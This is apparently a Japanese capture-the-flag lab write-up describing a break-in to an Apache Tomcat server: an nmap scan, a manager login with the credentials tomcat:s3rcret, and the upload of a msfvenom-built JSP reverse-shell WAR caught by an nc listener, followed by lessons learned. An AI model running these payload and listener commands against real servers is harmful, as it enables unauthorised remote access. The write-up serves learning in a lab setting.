1. nmapにてスキャンをするただしtcpの応答に対して何かフィルターをしてそうなので-sSを使用。そこでApache-Tomcatを使用しているのがわかった。
2. hacktrickを調べてみたところ興味深い記事にあたった。
<https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/tomcat>
●Default credentials
※デフォルトクレデンシャルに関してはほかにもあるのでさらに調べる必要があった。しかし興味深い文面があり、/Tomcat/htmlがあるとのこと。(Tomcatの管理画面?)
3. tomcat : s3rcretでログイン後、warファイルをアップロードする箇所がある。
※理由はわからないが、warエクスプロイトをUPしようとしたところエラー(403になる)になり、色々試した結果ターゲットマシンを再起動したらうまく行けた。
4.msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.9 LPORT=4444 -f war > shell.warを入力しエクスプロイトを作成。
5.unzip shell.warを解凍し.jspのファイル名を確認。
warは圧縮ファイルらしい。(初めて知った。)
6. choicefileをクリックして先ほど作成したwarをアップロードする。
nc -nlvp 4444
7. http://
8. reverseshell成功
~~~今回の反省と勉強になった点~~~
tomcatに管理画面があるのを初めて知った。
クレデンシャルに関して1つのブログではなくほかにも調べるべきだった。
admin:adminでログインできたので、それでよいと思ってしまったが権限が足りていなかった。
warが圧縮ファイルなのを初めて知った。
nmapが正しくできないなどのネットワーク周りでトラブったときはとりあえずwireshark。